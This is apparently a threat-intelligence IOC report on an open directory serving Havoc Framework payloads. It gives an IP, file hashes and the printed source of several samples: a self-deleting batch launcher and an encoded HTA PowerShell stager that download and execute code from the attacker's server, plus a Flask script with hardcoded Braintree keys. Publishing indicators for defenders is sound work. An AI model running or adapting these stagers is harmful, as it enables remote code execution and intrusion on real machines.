Havoc Framework IOCs
Jun 21, 2023
Persistence
Overview
An opendir was detected hosting multiple payloads including Havoc Framework Daemon, Zaqar Email Spoofer, a powershell loader, steganography tools, and several phishing/scam pages.
WZdUBCPW.jpeg
Screenshot
IOCs
IPv4
- 146.190.48.229
Files
- 05973b901ffe811e1a4f6e4ba4490508 cchome.exe
- a5ee41771304b0e3e42000ac93f20e13 hell.php
- 72cddf25aed48c79880082f7c3c9c94c help.php
- fae34b6aca2b3e512d690c36975653b8 shi.php
- 87926fa5d88b83c03af1cece27065b04 Chrome.exe
- d4286504d9fd691e8e9cd0c6202966f6 Google.exe
- 8ce637950af71b44469ceda82bd2760d Google3.exe
- 1ba533fdc0d6af3220b37b533e0cfcf4 Googlee.exe
- 05973b901ffe811e1a4f6e4ba4490508 cchome.exe
- c8db2a63d6aca66e46b3ff75f71a7c65 download_and_open.exe
- 25b41ff52fc5b2ea9924fee5b003df41 fuackme100.exe
- 5d51a0529768f0c86b3fe99d8326b845 fuck.exe
- 0f216e0a1230d3191a7dcf850ad97a07 haeds.exe
- 02fc64fb8266e9c2f30c30f967fc7eef hey.exe
- d41d8cd98f00b204e9800998ecf8427e loser.exe
- 8a873d4463884ad87edc0f1da16a0766 net7.0.exe
- 3baffae2c9dc65dd0d956bf5876fa7c4 openmyf.exe
- 313cf4c85059efd557ef6355f3ab7045 payload24.exe
- 5be4e5115cdf225871a66899b7bc5861 pics.exe
- 7d9accf060920368bdcc92b40a5b8690 uwuade.exe
- 81c37f904ee42d542c6cea29f0f1ef47 payload.dll
- eaef562c6995c02714a91f5a92ab4668 shellcode.bin
- 06c7dd98ff5b78872078c1f51cc9ba88 shellcode1.bin
- 30b80fd3e35c9960f1503cceaee766ab heyyy.hta
- 1e5e6855043f91a9cac96f5a7e39ab98 aild.py
- 8a23cf5d92fe0fc5de6818d49e8ee133 NFcmoOSI.html
- 9a4657e42cf710c73da89def0ddedc35 aah.html
- 59846e216edd60d6b76115ffa0d4ebff jak.html
- 5efa8b2f72a03463be31ef71852e47cc paaa.html
- ed134d442949c034f1caea2b34e4b1eb huh
- 46c567f4965f6381f5bc19a18bae0bbc launcher.bat
- 0aee080c6530030d020f7df6056fb7c7 php
- 810d62848e5277961345c0c6d6ac7118 WZdUBCPW.jpeg
launcher.bat
@echo off
start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://146.190.48.229:4053/download/powershell/VHJ1ZTptYXR0aWZlc3RhdGlvbiBldHc=') -UseBasicParsing|iex"
(goto) 2>nul & del "%~f0"
aild.py
from flask import Flask, request
import braintree
app = Flask(__name__)
braintree.Configuration.configure(
braintree.Environment.Sandbox,
"v2v28srx6mmzzfsv",
"dpdf4h4gdb53vj5q",
"05351842d6e450c78699f374bc20d3b3"
@app.route("/", methods=["GET"])
def generate_token():
client_token = braintree.ClientToken.generate()
return client_token
@app.route("/process_payment", methods=["POST"])
def process_payment():
nonce_from_the_client = request.form["payment_method_nonce"]
result = braintree.Transaction.sale({
"amount": "10.00",
"payment_method_nonce": nonce_from_the_client,
"options": {
"submit_for_settlement": True
}
})
if result.is_success:
return "Transaction successful!"
else:
return "Transaction failed"
if __name__ == "__main__":
app.run(host='146.190.48.229', port=5000)
heyyy.hta
var c= 'powershell -noP -sta -w 1 -enc IAAgAFMAVgAgACAAKAAiAFYAIgArACIAeABOACIAKQAgACAAKABbAHQAWQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA3AH0AewA4AH0AewA2AH0AewAyAH0AewA1AH0AewAzAH0AIgAtAGYAIAAnAE4AZQBUAC4AcwBlAHIAJwAsACcAUwBZAFMAdAAnACwAJwBuAHQATQBhACcALAAnAGUAUgAnACwAJwBFAE0ALgAnACwAJwBOAEEARwAnACwAJwBvAEkAJwAsACcAdgBpACcALAAnAEMAZQBQACcAKQApADsAIAAgACAAcwBFAFQALQBpAHQAZQBNACAAIAB2AGEAUgBJAEEAQgBsAEUAOgBNAEIAOAAgACgAIABbAHQAWQBwAEUAXQAoACIAewAyAH0AewAzAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAEkAbgBnACcALAAnAE8AZAAnACwAJwB0AEUAWABUAC4AJwAsACcARQBuAEMAJwApACkAIAA7ACAAIABzAFYAIAAoACcAMgAnACsAJwBCAFUAMQAnACkAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAJwBDAE8ATgAnACwAJwBWACcALAAnAEUAcgBUACcAKQAgACAAKQA7AHMARQBUACAAOQBTAGUATABtACAAKABbAFQAeQBwAGUAXQAoACIAewAyAH0AewA0AH0AewAwAH0AewAxAH0AewAzAH0AIgAgAC0ARgAnAG4AZQBUAC4AdwBFAEIAcgBlACcALAAnAFEAdQAnACwAJwBzACcALAAnAGUAcwB0ACcALAAnAHkAUwBUAGUAbQAuACcAKQAgACkAIAAgADsAIAAgACAAcwBFAFQALQB2AGEAUgBpAGEAQgBsAGUAIABZAGcANgBOACAAIAAoACAAWwB0AFkAcABFAF0AKAAiAHsAMQB9AHsAMwB9AHsANQB9AHsAMAB9AHsANAB9AHsAMgB9ACIALQBmACAAJwAuAEMAJwAsACcAUwB5AFMAJwAsACcAZQBEAGUATgB0AEkAYQBsAEMAYQBDAEgAZQAnACwAJwBUAGUAbQAnACwAJwByACcALAAnAC4ATgBFAFQAJwApACkAIAA7ACAAIAAkAG8AMwAwAD0AIAAgAFsAdABZAFAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADIAfQB7ADEAfQB7ADUAfQAiACAALQBmACAAJwBTACcALAAnAGMATwBEAEkATgAnACwAJwBUAGUAeAB0AC4ARQBOACcALAAnAFkAJwAsACcAcwB0AEUAbQAuACcALAAnAEcAJwApADsAIAAgAEkAZgAoACQAewBQAFMAVgBFAHIAcwBJAG8AbgBgAFQAYABBAEIATABFAH0ALgAiAFAAcwB2AEUAYABSAHMAaQBgAG8ATgAiAC4AIgBNAGEAYABqAE8AcgAiACAALQBnAGUAIAAzACkAewB9ADsAIAAkAFYAeABOADoAOgAiAEUAYAB4AHAARQBgAGMAVABgADEAMAAwAGMAbwBgAE4AVABJAGAATgB1AGUAIgA9ADAAOwAkAHsAdwBDAH0APQAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBqAGUAJwAsACcAYwB0ACcALAAnAE4AZQB3AC0ATwBiACcAKQAgACgAIgB7ADQAfQB7ADMAfQB7ADIAfQB7ADAAfQB7ADUAfQB7ADEAfQB7ADYAfQAiAC0AZgAgACcAdAAuACcALAAnAGUAYgBDAGwAJwAsACcAZQAnACwAJwAuAE4AJwAsACcAUwB5AHMAdABlAG0AJwAsACcAVwAnACwAJwBpAGUAbgB0ACcAKQA7ACQAewB1AH0APQAoACIAewAzAH0AewAxADAAfQB7ADkAfQB7ADIAfQB7ADUAfQB7ADYAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADEAfQB7ADgAfQAiAC0AZgAgACcALgAxADsAIABXAE8AVwA2ACcALAAnAEcAZQBjACcALAAnAC8ANQAuADAAIAAoACcALAAnAE0AbwAnACwAJwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgACcALAAnAFcAaQAnACwAJwBuAGQAbwB3AHMAIABOAFQAIAA2ACcALAAnADQAOwAgAFQAcgBpAGQAZQBuAHQALwAnACwAJwBrAG8AJwAsACcAbABsAGEAJwAsACcAegBpACcAKQA7ACQAewBTAGAAZQBSAH0APQAkACgAIAAgACQAbQBCADgAOgA6ACIAVQBOAGkAYwBvAGAAZABlACIALgAiAEcAZQBgAFQAYABzAFQAUgBpAG4AZwAiACgAIAAgACgAZwBlAFQALQBWAEEAcgBpAEEAQgBMAEUAIAAgACgAJwAyACcAKwAnAEIAdQAxACcAKQAgAC0AdgBBAGwAKQA6ADoAKAAiAHsAMwB9AHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAcgBvACcALAAnAG0AQgBhACcALAAnAHMAZQA2ADQAUwB0AHIAaQBuAGcAJwAsACcARgAnACkALgBJAG4AdgBvAGsAZQAoACgAIgB7ADEANAB9AHsANgB9AHsAOQB9AHsAMQAzAH0AewA1AH0AewAzAH0AewA4AH0AewAyAH0AewAxADIAfQB7ADEAMQB9AHsAMQAwAH0AewAxAH0AewA0AH0AewAwAH0AewA3AH0AIgAgAC0AZgAgACcAQQBBACcALAAnAEQASQBBACcALAAnAEEAQwAnACwAJwBRACcALAAnAE0AdwBBADAAJwAsACcAQQBEAEUAQQBPACcALAAnADAAQQBIAFEAQQBjAEEAQQA2ACcALAAnAD0APQAnACwAJwBBAHcAJwAsACcAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATgBnAEEAJwAsACcAQQBEAGsAQQBPAGcAQQB6AEEAJwAsACcAeQAnACwAJwA0AEEATgBBAEEANABBAEMANABBAE0AZwBBACcALAAnAHUAJwAsACcAYQBBAEIAJwApACkAKQApADsAJAB7AFQAfQA9ACgAIgB7ADMAfQB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAGUAdAAuAHAAaABwACcALAAnAGEAJwAsACcAZABtAGkAbgAvAGcAJwAsACcALwAnACkAOwAkAHsAVwBgAEMAfQAuACIAaABFAGEARABgAEUAcgBTACIALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGQAZAAnACwAJwBBACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAtAEEAZwAnACwAJwBlAG4AdAAnACwAJwBVAHMAZQByACcAKQAsACQAewB1AH0AKQA7ACQAewB3AGMAfQAuACIAcAByAE8AYABYAHkAIgA9ACAAKAAgACAASQBUAEUAbQAgAHYAQQByAEkAQQBiAGwARQA6ADkAcwBlAEwAbQAgACAAKQAuAHYAQQBMAHUAZQA6ADoAIgBkAEUARgBgAEEAVQBsAHQAVwBgAGUAQgBgAFAAcgBvAGAAeAB5ACIAOwAkAHsAdwBjAH0ALgAiAFAAcgBgAE8AWAB5ACIALgAiAEMAUgBlAGQAYABFAE4AdABgAGkAYQBgAGwAcwAiACAAPQAgACAAJAB5AEcANgBuADoAOgAiAEQAYABFAGYAQQB1AGwAVABuAEUAYABUAFcATwByAEsAYABDAFIARQBgAEQARQBgAE4AYABUAEkAQQBgAGwAcwAiADsAJAB7AFMAYwBgAFIASQBwAHQAYAA6AFAAcgBgAE8AYAB4AHkAfQAgAD0AIAAkAHsAdwBgAEMAfQAuACIAcABgAFIAbwB4AHkAIgA7ACQAewBLAH0APQAgACgAIABHAEUAdAAtAFYAQQBSAEkAQQBCAGwARQAgAE8AMwAwACAALQB2AGEAbAB1ACAAIAApADoAOgAiAEEAUwBgAEMAaQBJACIALgAiAEcAZQBgAFQAYABCAHkAdABlAFMAIgAoACgAKAAoACIAewAzAH0AewAyAH0AewAxAH0AewA1AH0AewA0AH0AewAwAH0AIgAgAC0AZgAnAG8AUABeAG4AcwArAD0AcgB3AFsAQQAlADQASQB2ADsAfgAnACwAJwA2AFQAKQAhACcALAAnAEYAVAAyADEAJwAsACcAQAAwACMAKABjAEUAJwAsACcAQgBMACcALAAnAGoAJwApACkAIAAtAGMAcgBlAFAATABhAGMARQAgACAAKABbAGMAaABBAHIAXQA3ADAAKwBbAGMAaABBAHIAXQA4ADQAKwBbAGMAaABBAHIAXQA1ADAAKQAsAFsAYwBoAEEAcgBdADEAMgA0ACkAKQA7ACQAewByAH0APQB7ACQAewBEAH0ALAAkAHsAawB9AD0AJAB7AGEAYABSAGcAcwB9ADsAJAB7AHMAfQA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAmACgAJwAlACcAKQB7ACQAewBKAH0APQAoACQAewBqAH0AKwAkAHsAcwB9AFsAJAB7AF8AfQBdACsAJAB7AEsAfQBbACQAewBfAH0AJQAkAHsAawB9AC4AIgBDAE8AdQBgAE4AdAAiAF0AKQAlADIANQA2ADsAJAB7AFMAfQBbACQAewBfAH0AXQAsACQAewBTAH0AWwAkAHsASgB9AF0APQAkAHsAUwB9AFsAJAB7AEoAfQBdACwAJAB7AFMAfQBbACQAewBfAH0AXQB9ADsAJAB7AEQAfQB8AC4AKAAnACUAJwApAHsAJAB7AEkAfQA9ACgAJAB7AGkAfQArADEAKQAlADIANQA2ADsAJAB7AGgAfQA9ACgAJAB7AGgAfQArACQAewBzAH0AWwAkAHsASQB9AF0AKQAlADIANQA2ADsAJAB7AFMAfQBbACQAewBJAH0AXQAsACQAewBTAH0AWwAkAHsASAB9AF0APQAkAHsAcwB9AFsAJAB7AEgAfQBdACwAJAB7AFMAfQBbACQAewBJAH0AXQA7ACQAewBfAH0ALQBiAHgAbwByACQAewBTAH0AWwAoACQAewBTAH0AWwAkAHsASQB9AF0AKwAkAHsAcwB9AFsAJAB7AEgAfQBdACkAJQAyADUANgBdAH0AfQA7ACQAewB3AGAAYwB9AC4AIgBIAEUAYABBAGQARQByAFMAIgAuACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAQQBkACcALAAnAGQAJwApAC4ASQBuAHYAbwBrAGUAKAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAQwBvAG8AawBpACcALAAnAGUAJwApACwAKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsAMAB9AHsANQB9AHsAOAB9AHsANwB9AHsANgB9AHsAMQB9ACIAIAAtAGYAIAAnAG8ANQBLADcAMwAnACwAJwAyAFYATQArAHMAPQAnACwAJwBNAHEAaQBLAEUAcwBTAFUAZAB6AGQAVQB5AD0ARgBpAHAAJwAsACcATQAnACwAJwBzACcALAAnAEoAJwAsACcAMAAnACwAJwBSADgAJwAsACcANABiAFEAZwBkAFoAZABhAGsAJwApACkAOwAkAHsAZABBAGAAVABBAH0APQAkAHsAdwBjAH0ALgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAGEAZABEAGEAdABhACcALAAnAG8AJwAsACcAbwB3AG4AbAAnACwAJwBEACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AFMAYABlAFIAfQArACQAewB0AH0AKQA7ACQAewBJAGAAVgB9AD0AJAB7AEQAYQBgAFQAYQB9AFsAMAAuAC4AMwBdADsAJAB7AEQAYABBAFQAYQB9AD0AJAB7AGQAYQBgAFQAYQB9AFsANAAuAC4AJAB7AEQAYABBAHQAYQB9AC4AIgBMAEUATgBHAGAAVABIACIAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJAB7AFIAfQAgACQAewBEAGAAQQBUAGEAfQAgACgAJAB7AEkAdgB9ACsAJAB7AGsAfQApACkAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAFgAJwAsACcASQBFACcAKQA='
new ActiveXObject('WScript.Shell').Run(c);
Partial Decode
SV ("V"+"xN") ([tYpE]("{1}{4}{0}{7}{8}{6}{2}{5}{3}"-f 'NeTserSYStntMaeREMNAGoIviCeP')); sET-iteM vaRIABlE:MB8 ( [tYpE]("{2}{3}{1}{0}" -f'IngOdtEXTEnC')) ; sV ('2'+'BU1') ( [TYPe]("{0}{1}{2}"-f'CONVErT') );sET 9SeLm ([Type]("{2}{4}{0}{1}{3}" -F'neTwEBreQusestySTem') ) ; sET-vaRiaBle Yg6N ( [tYpE]("{1}{3}{5}{0}{4}{2}"-f 'CSySeDeNtIalCaCHeTemrNET')) ; $o30= [tYPE]("{0}{3}{4}{2}{1}{5}" -f 'ScODINTextENYstEmG'); If(${PSVErsIonTABLE}"PsvERsioN""MajOr" -ge 3){}; $VxN::"ExpEcT100coNTINue"=0;${wC}=("{2}{0}{1}" -f 'jectNew-Ob') ("{4}{3}{2}{0}{5}{1}{6}"-f 'tebCleNSystemWient');${u}=("{3}{10}{9}{2}{5}{6}{0}{7}{4}{1}{8}"-f '1; WOW6Gec/50 (Mo70; rv:110) like Windows NT 64; Trident/kollazi');${SeR}=$( $mB8::"UNicode""GeTsTRing"( (geT-VAriABLE ('2'+'Bu1') -vAl)::("{3}{0}{1}{2}"-f'romBase64StringF')Invoke(("{14}{6}{9}{13}{5}{3}{8}{2}{12}{11}{10}{1}{4}{0}{7}" -f 'AADIAACQMwA0ADEAO0AHQAcAA6==AwAC8ALwAxADQANgAADkAOgAzAy4ANAA4AC4AMgAuaAB'))));${T}=("{3}{1}{2}{0}"-f'etphpadmin/g/');${WC}"hEaDErS"("{1}{0}" -f'ddA')Invoke(("{2}{0}{1}" -f'-AgentUser'),${u});${wc}"prOXy"= ( ITEm vArIAblE:9seLm )vALue::"dEFAUltWeBProxy";${wc}"PrOXy""CRedENtials" = $yG6n::"DEfAulTnETWOrKCREDENTIAls";${ScRIpt:PrOxy} = ${wC}"pRoxy";${K}= ( GEt-VARIABlE O30 -valu )::"ASCiI""GeTByteS"(((("{3}{2}{1}{5}{4}{0}" -f'oP^ns+=rw[A%4Iv;~6T)!FT21@0#(cEBLj')) -crePLacE ([chAr]70+[chAr]84+[chAr]50),[chAr]124));${r}={${D},${k}=${aRgs};${s}=0255;0255|&('%'){${J}=(${j}+${s}[${_}]+${K}[${_}%${k}"COuNt"])%256;${S}[${_}],${S}[${J}]=${S}[${J}],${S}[${_}]};${D}|('%'){${I}=(${i}+1)%256;${h}=(${h}+${s}[${I}])%256;${S}[${I}],${S}[${H}]=${s}[${H}],${S}[${I}];${_}-bxor${S}[(${S}[${I}]+${s}[${H}])%256]}};${wc}"HEAdErS"("{0}{1}"-f 'Add')Invoke(("{0}{1}" -f 'Cookie'),("{4}{2}{3}{0}{5}{8}{7}{6}{1}" -f 'o5K732VM+s=MqiKEsSUdzdUy=FipMsJ0R84bQgdZdak'));${dATA}=${wc}("{3}{2}{1}{0}" -f'adDataoownlD')Invoke(${SeR}+${t});${IV}=${DaTa}[03];${DATa}=${daTa}[4${DAta}"LENGTH"];-join[Char[]](& ${R} ${DATa} (${Iv}+${k}))|&("{1}{0}"-f'XIE')